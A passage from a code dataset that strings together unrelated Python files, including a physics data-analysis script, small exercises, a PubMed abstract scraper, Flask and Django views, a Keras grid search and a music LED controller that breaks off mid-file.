optimize parameters\n# config\nconfig = load_yaml(\"\"\"\n---\ninit_params:\n k: 0.9963008816567109\n th: 0.4298510328659137\n x0: 426.5012296723083\n y0: 485.09432064781976\nr_bins: [100, 300, 500]\nth_bins: [-3.141592653589793, 3.141592653589793, 500]\n\"\"\")\n__opt = config['init_params']\nopt = (__opt['k'], __opt['th'], __opt['x0'], __opt['y0'])\n*rlim, rbins = config['r_bins']\n*thlim, thbins = config['th_bins']\n\n# do\npolarized = ana.Hist( # shape=(r,th)\n None,\n np.linspace(*rlim, num=rbins+1),\n np.linspace(*thlim, num=thbins+1))\noptimized = polarized.copy\n\n# sample data\n_, inverter = ana.SqueezeTransformer(*opt).operators # f(x,z)\npolarized.intensity = ana.convert_df_xy2rth( # f(x,z)->g(x,z)->g(z,x)->h(r,th)\n lambda z, x: origin.intensity(*inverter(x, z)))\nth_smp = polarized.y_centers\nr_smp = np.array(tuple(\n polarized.x_centers[w.argmax()] for w in polarized.hist.T))\n\n# subplot(311)\nplt.figure(figsize=(8, 8))\nplt.subplot(211)\nplt.pcolormesh(*polarized.meshed_yxz)\nplt.plot(th_smp, r_smp, '*w')\nplt.xlim(thlim)\n\n\n# %%\ndef __f(opt):\n transformer, inverter = ana.SqueezeTransformer(*opt).operators # f(x,z)\n optimized.intensity = ana.convert_df_xy2rth(\n # f(x,z)->g(x,z)->g(z,x)->h(r,th)\n lambda z, x: origin.intensity(*inverter(x, z)))\n return entropy(optimized.hist.sum(0))+entropy(optimized.hist.sum(1))\nopt = fmin(__f, opt)\n\n\n# %%\n# optimize parameters\ntransformer, inverter = ana.SqueezeTransformer(*opt).operators # f(x,z)\noptimized.intensity = ana.convert_df_xy2rth( # f(x,z)->g(x,z)->g(z,x)->h(r,th)\n lambda z, x: origin.intensity(*inverter(x, z)))\nth = optimized.y_centers\ndist = optimized.hist.sum(0)\n\n# subplot(312)\nplt.subplot(212)\nplt.pcolormesh(*optimized.meshed_yxz)\nplt.xlim(thlim)\n\n# %%\n# SET PARAMETERS FOR INVERSION\nconfig = load_yaml(\"\"\"\n---\nlinear_opt:\n k: 0.9942\n th: 0.15837699280148068\n x0: 426.2\n y0: 484.8\nlegendre_nlim: 10\nz_bins: [-500, 500, 1000]\nr_bins: [0, 500, 2000]\nth_bins: [-3.141592653589793, 3.141592653589793, 360]\n\"\"\")\n#opt = config['linear_opt']\nnlim = config['legendre_nlim']\n*zlim, zbins = config['z_bins']\n*rlim, rbins = config['r_bins']\n*thlim, thbins = config['th_bins']\n\n# symmetric inversion\n# inverse data symmetric\nz_edges = np.linspace(*zlim, num=zbins+1)\noptimized = ana.Hist(None, z_edges, z_edges) # shape=(x,z)\nreconstructed = optimized.copy # shape=(r,z)\ntransformer, inverter = ana.SqueezeTransformer(*opt).operators\noptimized.intensity = lambda x, z: origin.intensity(*inverter(x, z))\nreconstructed.hist = ana.abel_inverse( # shape=(r,z)\n optimized.hist, optimized.x_edges)\n\n# legendre transformation\n# finite-legendre-transform\nr_edges = np.linspace(*rlim, num=rbins+1)\nth_edges = np.linspace(*thlim, num=thbins+1)\npolarized = ana.Hist(None, r_edges, th_edges) # shape=(r,th)\ninverted = polarized.copy\nweighted = polarized.copy\npolarized.intensity = ana.convert_df_xy2rth(\n lambda z, r: reconstructed.intensity(r, z))\ncoeff_neg, coeff_pos, basis = ana.finite_legendre_transform_in_theta(\n polarized.hist.T, polarized.y_edges, nlim+1) # shapes=(n,r)(n,th)\ncoeff_avg = (coeff_neg + coeff_pos)/2\n\n# %%\n# CALCULATE BETAS AND PLOT\nconfig = load_yaml(\"\"\"\n---\nsides: [left, right]\nbetas: [1, 2]\nrlim: [null] # null for auto-set\nylim: [null] # null for auto-set\nreturns:\n reg1: [152, 162]\n reg2: [440, 450]\n\"\"\")\nsides = config['sides']\nbetas = config['betas']\nrlim = config['rlim']\nylim = config['ylim']\nrets = config['returns']\n\n# plot\nplt.figure(figsize=(12, 8))\nax_left = plt.gca()\nplt.twinx()\nax_rght = plt.gca()\nfor side, coeff in (\n ('left', coeff_neg),\n ('right', coeff_pos),\n ('avg', coeff_avg),\n ):\n if not side in sides:\n continue\n inverted.hist = coeff.T.dot(basis) # shape=(r,th)\n weighted.intensity = (\n lambda r, th:\n inverted.intensity(r, th)*np.abs(r*np.sin(th))*np.pi)\n\n plt.sca(ax_left)\n for i, beta in enumerate(coeff[1:]/coeff[0]):\n if not i+1 in betas: continue\n plt.plot(polarized.x_centers, beta,\n label='beta{} ({})'.format(i+1, side))\n plt.sca(ax_rght)\n plt.plot(weighted.x_centers, weighted.hist.sum(1),\n 'k', label='dist ({})'.format(side))\n\n for key in rets:\n rreg = rets[key]\n dist = weighted.hist.sum(1)\n r_mask = ana.get_mask(rreg)\n idx = r_mask(weighted.x_centers)\n print('{} ({:5s}): {}--{}'.format(key, side, *rreg))\n for i, beta in enumerate(coeff[1:]/coeff[0]):\n avg, std = ana.get_avg(beta[idx], weights=dist[idx])\n print(' beta{:2}: {:+6f} +-{:6f}'.format(\n i+1, avg, std))\n print('')\nplt.sca(ax_left)\nplt.xlabel('r (px)')\nplt.ylabel('beta (1)')\nplt.ylim(-1, 4)\nplt.legend(loc=2)\nplt.minorticks_on()\nplt.grid(which='both')\n\nplt.sca(ax_rght)\nplt.ylabel('intensity (arb unit)')\nplt.xlim(*rlim)\nplt.ylim(*ylim)\nplt.legend(loc=1)\nplt.show()\n\n# %%\nfb = 5.606e-6\ndef norm(arr):\n# return arr/arr.max()\n return arr\n# return arr/arr[590:700].sum()\n\nplt.figure(figsize=(10,10))\nplt.plot(weighted.x_centers**2*fb*40, norm(dist659), label='659')\nplt.plot(weighted.x_centers**2*fb*40, norm(dist660), label='660')\n\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist656on), label='on t0')\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist656off), label='off t0')\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist656on-dist656off), label='diff t0')\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist657on), label='on t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist657off), label='off t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist657on-dist657off), label='diff t0+1ps')\n\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655on_t0), label='on t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655off_t0), label='off t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655on_t0-dist650_655off_t0), label='diff t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655on_1ps), label='on t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655off_1ps), label='off t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655on_1ps-dist650_655off_1ps), label='diff t0+1ps')\n\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642on_t0), label='on t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642off_t0), label='off t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642on_t0-dist631_642off_t0), label='diff t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642on_1ps), label='on t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642off_1ps), label='off t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642on_1ps-dist631_642off_1ps), label='diff t0+1ps')\n\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649on_t0), label='on t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649off_t0), label='off t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649on_t0-dist643_649off_t0), label='diff t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649on_1ps), label='on t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649off_1ps), label='off t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649on_1ps-dist643_649off_1ps), label='diff t0+1ps')\nplt.legend()\nplt.grid()\n#plt.xlim(0,10)\n#plt.ylim(0,2000)","sub_path":"SACLA 2017A8005/opt_pars_using_entropy.py","file_name":"opt_pars_using_entropy.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"187792527","text":"fact_dict = {}\ndef fact(n):\n if n not in fact_dict.keys():\n if n==1 or n==0:\n fact_dict[n] = 1\n else:\n fact_dict[n] = n * fact(n-1)\n return fact_dict[n]\n\n\n\ndef get_result():\n total = 0\n mystr = str(fact(100))\n for elem in mystr:\n total += int(elem)\n #pass\nif __name__ == '__main__':\n import timeit\n print(timeit.timeit(\"get_result()\", setup=\"from __main__ import get_result\", number = 10000))/10000\n\n","sub_path":"pb20.py","file_name":"pb20.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"165697297","text":"def main():\n a = input(\"enter a number=\")\n try:\n x = int(a) % 2\n if (int(x) == 0):\n print(a + \" is even\")\n else:\n print(a + \" is odd\")\n except:\n print(\"invalid entry\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Batly Programmed/even-or-odd.py","file_name":"even-or-odd.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"447302881","text":"import unittest\n\nfrom brittle_wit.helpers import *\n\n\nclass TestHelpers(unittest.TestCase):\n\n def test_parse_date(self):\n s = \"Tue Mar 29 15:40:03 +0000 2016\"\n self.assertEqual(parse_date(s).timestamp(), 1459266003.0)\n\n def test_wrapping_handler(self):\n messages = []\n\n handler = WrappingHandler(lambda msg: messages.append(msg))\n handler.send(\"hello.\")\n handler.send(\"it's me.\")\n\n self.assertEqual(\" \".join(messages), \"hello. it's me.\")\n","sub_path":"test/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"10856934","text":"import cdms2\nimport os,sys\n\nf=cdms2.open(os.path.join(sys.prefix,\"sample_data\",\"clt.nc\"))\n\ns=f(\"clt\",slice(0,1))\n\ng=cdms2.createGaussianGrid(64)\ngl = cdms2.createZonalGrid(g)\nregridded = s.regrid(gl)\n","sub_path":"testing/cdms2/test_regrid_zonal_switch_to_regrid2.py","file_name":"test_regrid_zonal_switch_to_regrid2.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"580012799","text":"if __name__ == '__main__':\n n = int(input())\n student_marks = {}\n for i in range(n):\n stroka = input()\n splitter = stroka.split(\" \")\n imya = splitter[0]\n n1=float(splitter[1])\n n2=float(splitter[2])\n n3=float(splitter[3])\n n_avg=(n1+n2+n3)/3.0\n student_marks[imya]=\"%.2f\" % n_avg\n s_name=input()\n print(student_marks[s_name])\n","sub_path":"week10/Hackerrank/findingthepercentage.py","file_name":"findingthepercentage.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"342064223","text":"###\n###\n###\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport wx\nimport os\nimport os.path\nimport sys\nimport numpy as np\n\nclass wxDisconnect3D():\n\n # ----------------------------------------------------------------------\n\n def Execute2_3Disconnect(self, event):\n if not self.UserInfo.mojo_files_found:\n print('Dojo files have not been validated.')\n print('Select Dojo files folder.')\n return False\n print('Create ID tables for 3D disconnect..')\n\n ncol = self.grid2.GetNumberCols()\n nrow = self.grid2.GetNumberRows()\n DisconnectIDs = []\n for col in range(ncol):\n TargetColVals = [self.grid2.GetCellValue(row, col).encode(\"UTF-8\") for row in range(nrow)]\n TargetColVals = [i for i in TargetColVals if i is not '']\n TargetColVals = [int(i) for i in TargetColVals]\n if TargetColVals != []:\n DisconnectIDs.append(np.array(TargetColVals, dtype='uint32'))\n print(DisconnectIDs)\n\n #\n if DisconnectIDs == []:\n print('No ID is specified.')\n return False\n #\n tmp1 = list(chain.from_iterable(DisconnectIDs))\n tmp2 = list(set(tmp1))\n if len(tmp1) != len(tmp2):\n print('Each ID can appear only once.')\n return False\n #\n Disconnect3D.main(DisconnectIDs, self.UserInfo)\n\n # ----------------------------------------------------------------------\n # I want to move the AppendRowsCols2 to wxDialog.py\n # ----------------------------------------------------------------------\n\n\n def AppendRowsCols2(self, event): # wxGlade: MojoControlPanel.\n if not hasattr(self, \"popupID01\"):\n self.popupID21 = wx.NewId()\n self.Bind(wx.EVT_MENU, self.OnPopupOne21, id=self.popupID21)\n menu = wx.Menu()\n menu.Append(self.popupID21, \"Add Row\")\n self.PopupMenu(menu) ###\n menu.Destroy()\n\n def OnPopupOne21(self, event):\n self.grid2.AppendRows(1)\n # ----------------------------------------------------------------------\n\n def Execute2_3Disconnect(self, event): # wxGlade: MojoControlPanel.\n wxDialogs.Execute3DDisconnector(self, event)\n\n def Clear2_3Disconnect(self, event): # wxGlade: MojoControlPanel.\n self.grid2.ClearGrid()\n\n","sub_path":"wxMain/wxDisconnect3D.py","file_name":"wxDisconnect3D.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"384447453","text":"# Test edit\n# Erick Lu\n# pubmed_extractor.py\n\n# SAMPLE SEARCH FUNCTION:\n\n\"\"\"\nhttps://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&term=cancer&usehistory=y&retmin=0&retmax=500\n\"\"\"\n\n# SAMPLE FETCH FUNCTION:\n\n'''\nhttp://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&WebEnv=NCID_1_196289963_130.14.18.34_9001_1524513200_1515294449_0MetA0_S_MegaStore&query_key=1&retmode=json&rettype=abstract\n'''\n\n# Import the necessary packages.\nimport csv\nimport re\nimport urllib\nimport os\nfrom time import sleep\n\n\n# Gather all the terms that you want to search Pubmed for.\nterms = [\"cancer\"]\n\nnumfailed = 0\nfor item in terms:\n \n \t#Create the csv file that will hold the categorized abstracts.\n \n # myfile = open ( str(item) + \" abstracts.csv\", 'wb')\n # master_file = csv.writer(myfile, delimiter = ',')\n datefile = open ('cancerabstracts.txt', 'w')\n # errorfile = open(\"error2.txt\", 'w')\n #Write the names for each column in the CSV file.\n # master_file.writerow([\"Journal\", \"Title\", \"Authors\", \"Organization\", \"Abstract\", \"PMID\" ])\n \n #The set of static variables needed for the ESearch function:\n baseURL = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/'\n eutil = 'esearch.fcgi?'\n dbParam = 'db=pubmed'\n usehistoryParam = '&usehistory=y'\n rettype = '&rettype=json'\n eutilfetch = 'efetch.fcgi?'\n \n\n termParam = '&term='+ str(item)\n retmax = 500\n retstart = 0\n run = True\n while run:\n\n #Print the URL to check in terminal incase of error.\n print (baseURL+eutil+dbParam+termParam+usehistoryParam)\n\n\n #Open the webpage that will run the ESearch Function.\n\n f = urllib.urlopen (baseURL+eutil+dbParam+termParam+usehistoryParam+rettype)\n data = f.read().decode('utf-8')\n\n #Print the search to the terminal (debugging purposes)\n print (data)\n\n #Extract the Web Env and querykey (Tracking Search), and count (for iteration), \n webenv = \"&WebEnv=\" + re.findall (\"(\\S+)<\\/WebEnv>\", data)[0]\n count = int(re.findall(\"(\\d+?)\",data)[0])\n querykey = \"&query_key=\" + re.findall(\"(\\d+?)\",data)[0]\n\n #webenv = 'NCID_1_811107105_130.14.22.33_5555_1351061178_277739021'\n\n #retrieve the data. Retmax = the number of abstracts returned. Retstart = \n # the index at which retmax begins.\n\n\n #Reset some parameters for the EFetch utility. many of parameters will be recycled from above.\n\n rettype = \"&rettype=abstract\"\n str_retmax = \"&retmax=\" + str(retmax)\n retmode = \"&retmode=text\"\n \n \n str_retstart = \"&retstart=\" + str(retstart)\n fetch_url = baseURL+eutilfetch+dbParam+querykey+webenv+str_retstart+str_retmax+retmode+rettype\n\n #Print the url for debugging purposes.\n print (fetch_url)\n \n print (\"sleeping for 5 seconds\")\n sleep(3)\n \n\n #To ensure the program runs to completion, use a try/except clause.\n #The program will try to extract from the KB, and write to the csv file.\n #If there is an error in the extraction, a non-halting error will be thrown\n #containing the index at which the extraction error occured.\n try:\n #Open the webpage with the fetch utility.\n fetch = urllib.urlopen (fetch_url)\n failed = False\n #Decode the data returned by the fetch command.\n datam = fetch.read().decode('utf-8')\n #print(datam)\n #Strip off Unnecessary text. \n #chunk = datam[62:-20] \n\n #Split the data into individual abstracts.\n chunks = datam.split(\"[PubMed\")\n if len(chunks) < 100:\n print(str(retstart))\n failed = True\n\n \n #print ((len(chunks)-4))\n #For each abstract, split the individual abstract and write it to the CSV file,\n #Categorized by Journal, Title, Author, Organization, Abstract, and PMID.\n for i in range(0, (len(chunks)-4)):\n #To obtain categories, split every double newline.\n splitchunk = chunks[i].split(\"\\n\\n\")[1:2]\n #splitchunk = [f for f in splitchunk if f != \"\"]\n \n\n #Some of the abstracts returned either are incomplete or have no information.\n #A full abstract will have All six categories.\n #The abstracts that have less than 5 categories will be ignored because of \n #Insufficient information. \n #The abstracts with only 5 categories have been found to be missing information\n #on the organization from which they came from. I will add them to the CSV file\n datefile.write(\" \".join(splitchunk))\n datefile.write(\"\\n\")\n \n \n # master_file.writerow(splitchunk)\n #print(splitchunk)\n if failed == True:\n datefile.write(\"\\n Failed at \" + str(retstart) + \"\\n\\n\")\n else:\n datefile.write(\"\\n Success at \" + str(retstart) + \"\\n\\n\")\n\n #The except clause explained above.\n \n except:\n print (\"Error at retstart:\", retstart)\n datefile.write(\"\\n Failed at \" + str(retstart) + \"\\n\")\n numfailed = numfailed +1\n #If the return index is higher than the total number of indexes, then break the loop and exit.\n #break\n if retstart > count:\n break\n #If it is not, then update retstart and perform the actions again.\n retstart = retstart+retmax\n print (\"sleeping for 3 seconds\")\n sleep(3)\n \n \n #NOTE: EFETCH automatically cuts off if retmax is over the total number of articles remaining. It will not error.\n datefile.close()\n #errorfile.close()\n\n \nprint (numfailed)\n\n\n\n\n\n\n\n\n","sub_path":"pubmed_extractor.py","file_name":"pubmed_extractor.py","file_ext":"py","file_size_in_byte":6972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"81924946","text":"#!/usr/bin/env python\nimport os\n\nCOV = None\nif os.environ.get(\"FLASK_COVERAGE\"):\n import coverage\n COV = coverage.coverage(branch=True, include='powertrain/*')\n COV.start()\n\nfrom powertrain import create_app, db\nfrom powertrain.models import DerivedBehavior, RawBehavior, Configuration,\\\n DerivedImage, RawImage, Job, ExecutionUnit, JobSetup, JobTeardown,\\\n MRSession, Project, Scan, Task, TaskSetup, TaskTeardown, User\nfrom flask.ext.script import Manager, Shell\nfrom flask.ext.migrate import Migrate, MigrateCommand\n\n\napp = create_app(os.getenv('FLASK_CONFIG') or 'default')\nmanager = Manager(app)\nmigrate = Migrate(app, db)\n\ndef make_shell_context():\n return dict(app=app,\n db=db,\n DerivedBehavior=DerivedBehavior,\n RawBehavior=RawBehavior,\n Configuration=Configuration,\n DerivedImage=DerivedImage,\n RawImage=RawImage,\n Job=Job,\n ExecutionUnit=ExecutionUnit,\n JobSetup=JobSetup,\n JobTeardown=JobTeardown,\n MRSession=MRSession,\n Project=Project,\n Scan=Scan,\n Task=Task,\n TaskSetup=TaskSetup,\n TaskTeardown=TaskTeardown,\n User=User)\n\nmanager.add_command(\"shell\", Shell(make_context=make_shell_context))\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef test(coverage=False):\n \"\"\"Run the unit tests.\"\"\"\n if coverage and not os.environ.get('FLASK_COVERAGE'):\n import sys\n os.environ['FLASK_COVERAGE'] = '1'\n os.execvp(sys.executable, [sys.executable] + sys.argv)\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=1).run(tests)\n if COV:\n COV.stop()\n COV.save()\n print(\"Coverage summary:\")\n COV.report()\n basedir = os.path.abspath(os.path.dirname(__file__))\n covdir = os.path.join(basedir, 'htmlcov')\n COV.html_report(directory=covdir)\n print(\"HTML version: file://{}/index.html\".format(covdir))\n COV.erase()\n\n\n\nif __name__ == '__main__':\n manager.run()\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"268788113","text":"from django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom plant_core.models import HeaterController\nfrom plant_core.serializers import HeaterSerializer\n\n\nclass HeaterView(GenericAPIView):\n serializer_class = HeaterSerializer\n\n @csrf_exempt\n def post(self, request):\n serializer = HeaterSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n try:\n power = HeaterController.objects.all()[0].power\n except IndexError:\n power = 0\n\n return Response(\n {\"type\": \"HeaterView\", \"acknowledged\": True, \"power\": power},\n status=status.HTTP_201_CREATED,\n )\n\n else:\n return Response(\n {\n \"type\": \"HeaterView\",\n \"error\": True,\n \"message\": \"Missing mandatory key(s) to process\",\n \"power\": 0,\n },\n status=status.HTTP_400_BAD_REQUEST,\n )\n","sub_path":"plant_core/views/heater.py","file_name":"heater.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"350638980","text":"# -*- coding: utf-8 -*-\r\n# pip install --upgrade --no-deps git+git://github.com/Theano/Theano.git\r\n\r\n# Installing Tensorflow\r\n# pip install tensorflow\r\n\r\n# Installing Keras\r\n# pip install --upgrade keras\r\n\r\n# Part 1 - Data Preprocessing\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('Churn_Modelling.csv')\r\nX = dataset.iloc[:, 3:13].values\r\ny = dataset.iloc[:, 13].values\r\n\r\n# Encoding categorical data\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_X_1 = LabelEncoder()\r\nX[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\r\nlabelencoder_X_2 = LabelEncoder()\r\nX[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\r\nonehotencoder = OneHotEncoder(categorical_features = [1])\r\nX = onehotencoder.fit_transform(X).toarray()\r\nX = X[:, 1:]\r\n\r\n# Splitting the dataset into the Training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, \r\n random_state = 0)\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nX_train = sc.fit_transform(X_train)\r\nX_test = sc.transform(X_test)\r\n\r\n# Part 2 - Now let's make the ANN!\r\n\r\n# Importing the Keras libraries and packages\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Dropout\r\n\r\n# Partie 4\r\n\r\n# Importing Module\r\nfrom keras.wrappers.scikit_learn import KerasClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\n# Fonction de construction\r\ndef build_classifier(optimizer):\r\n classifier = Sequential()\r\n classifier.add(Dense(units = 6, kernel_initializer = 'uniform', \r\n activation = 'relu', input_dim = 11))\r\n classifier.add(Dense(units = 6, kernel_initializer = 'uniform', \r\n activation = 'relu'))\r\n classifier.add(Dense(units = 1, kernel_initializer = 'uniform', \r\n activation = 'sigmoid'))\r\n classifier.compile(optimizer = optimizer, loss = 'binary_crossentropy', \r\n metrics = ['accuracy'])\r\n return classifier\r\n\r\n# K-fold cros validation\r\nclassifier = KerasClassifier(build_fn=build_classifier)\r\nparameters = {\"batch_size\": [25, 32],\r\n \"epochs\": [100,500],\r\n \"optimizer\": [\"adam\",\"rmsprop\"]}\r\ngrid_search = GridSearchCV(estimator=classifier,\r\n param_grid=parameters,\r\n scoring=\"accuracy\",\r\n cv=10)\r\ngrid_search = grid_search.fit(X_train, y_train)\r\n\r\n\r\nbest_parameters = grid_search.best_params_\r\nbest_precision = grid_search.best_score_\r\n\r\n\r\n\r\n","sub_path":"ReseauNeurone/dropout_Eviter_SurApprentisssage.py","file_name":"dropout_Eviter_SurApprentisssage.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"374526114","text":"matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\nspar = mai = scol = 0\nfor l in range(0, 3):\n for c in range(0, 3):\n matriz[l][c] = int(input(f\"Digite um numero para a posição [{l}, {c}].\\n\"))\nfor l in range(0, 3):\n for c in range(0, 3):\n print(f\"[{matriz[l][c]:^5}]\", end='')\n if matriz[l][c] %2 == 0:\n spar += matriz[l][c]\n print()\nprint(f\"A soma dos valores pares é {spar}.\")\nfor l in range(0, 3):\n scol += matriz[l][2]\nprint(f\"A soma dos valores da 3 coluna é {scol}.\")\nfor c in range(0, 3):\n if c == 0:\n mai = matriz[1][c]\n elif matriz[l][c] > mai:\n mai = matriz[1][c]\nprint(f\"O maior valor da 2 linha é o {mai}.\")\n# Este algoritmo coleta números e os manipula de modo com que forme uma matriz.","sub_path":"Estruturas/Estruturas_compostas/Tuplas_e_listas/Matriz2.py","file_name":"Matriz2.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"217771330","text":"#!/usr/bin/env python3\n\nfrom .input import get_input\nfrom collections import defaultdict\n\nclass Seats:\n def __init__(self, lines):\n self.seats = set()\n for y, line in enumerate(lines):\n line = line.strip()\n for x, c in enumerate(line):\n if c == 'L':\n self.seats.add(x + y*1j)\n xm, ym = x + 1, y + 1\n\n self.adjacent = {}\n self.adjacent_view = {}\n directions = [1, 1+1j, 1j, -1+1j, -1, -1 - 1j, -1j, 1-1j]\n for x in range(xm):\n for y in range(ym):\n pos = x + y*1j\n if pos not in self.seats:\n continue\n self.adjacent[pos] = [pos + d for d in directions\n if pos + d in self.seats]\n def in_view(d):\n kpos = pos + d\n while 0 <= kpos.real < xm and 0 <= kpos.imag < ym:\n if kpos in self.seats:\n return kpos\n kpos += d\n av = []\n for d in directions:\n kpos = in_view(d)\n if kpos:\n av.append(kpos)\n self.adjacent_view[pos] = av\n\n def stabilize(self, adjacent, N):\n state = defaultdict(bool)\n while True:\n def change(s):\n occupied = state[s]\n if occupied:\n return sum(state[a] for a in adjacent[s]) >= N\n else:\n return not any(state[a] for a in adjacent[s])\n to_change = [s for s in self.seats if change(s)]\n if not to_change:\n return state\n for c in to_change:\n state[c] = not state[c]\n\ndef test(args):\n seats = Seats(\"\"\"L.LL.LL.LL\nLLLLLLL.LL\nL.L.L..L..\nLLLL.LL.LL\nL.LL.LL.LL\nL.LLLLL.LL\n..L.L.....\nLLLLLLLLLL\nL.LLLLLL.L\nL.LLLLL.LL\"\"\".split('\\n'))\n print(sum(seats.stabilize(seats.adjacent, 4).values()))\n print(sum(seats.stabilize(seats.adjacent_view, 5).values()))\n print('Tests passed')\n\ndef main(args):\n seats = Seats(get_input(args.YEAR, args.DAY))\n print(sum(seats.stabilize(seats.adjacent, 4).values()))\n print(sum(seats.stabilize(seats.adjacent_view, 5).values()))\n\n\n","sub_path":"lib/aoc/year_2020_day_11.py","file_name":"year_2020_day_11.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"538901034","text":"# Main File\n# ----------------\n#\n# The program will start here.\n# This file will only initialize and start the processes.\n\nfrom sys import version_info\nimport sys\n\nif version_info < (3, 6):\n sys.exit(\"Error: MLSC requires Python 3.6 or greater.\")\n\nfrom libs.audio_process_service import AudioProcessService\nfrom libs.notification_service import NotificationService\nfrom libs.device_manager import DeviceManager\nfrom libs.config_service import ConfigService\nfrom libs.webserver import Webserver\n\nfrom multiprocessing import Process, Queue, Lock\nfrom time import sleep\nimport logging\n\n\nclass Main():\n \"\"\"\n This is the main class. It controls everything.\n It's the first starting point of the program.\n \"\"\"\n def start(self):\n \"\"\"\n This function will start all necessary components.\n Let's go :-D\n \"\"\"\n # We need a lock to prevent too fast saving and loading actions of the config\n self._config_lock = Lock()\n\n # Create the instance of the config\n self._config_instance = ConfigService.instance(self._config_lock)\n self._config = self._config_instance.config\n\n self.logger = logging.getLogger(__name__)\n self.logger.info(\"Initializing MLSC...\")\n\n # Check config compatibility\n self._config_instance.check_compatibility()\n\n # Prepare the queue for the output\n self._output_queue = Queue(2)\n self._effects_queue = Queue(100)\n self._audio_queue = Queue(2)\n\n # Prepare all notification queues\n self._notification_queue_audio_in = Queue(100)\n self._notification_queue_audio_out = Queue(100)\n\n self._notification_queue_device_manager_in = Queue(100)\n self._notification_queue_device_manager_out = Queue(100)\n\n self._notification_queue_webserver_in = Queue(100)\n self._notification_queue_webserver_out = Queue(100)\n\n # Start the DeviceManager Service\n self._device_manager = DeviceManager()\n self._device_manager_process = Process(\n target=self._device_manager.start,\n args=(\n self._config_lock,\n self._notification_queue_device_manager_in,\n self._notification_queue_device_manager_out,\n self._effects_queue,\n self._audio_queue,\n ))\n self._device_manager_process.start()\n\n # Start Notification Service\n self._notification_service = NotificationService()\n self._notification_service_process = Process(\n target=self._notification_service.start,\n args=(\n 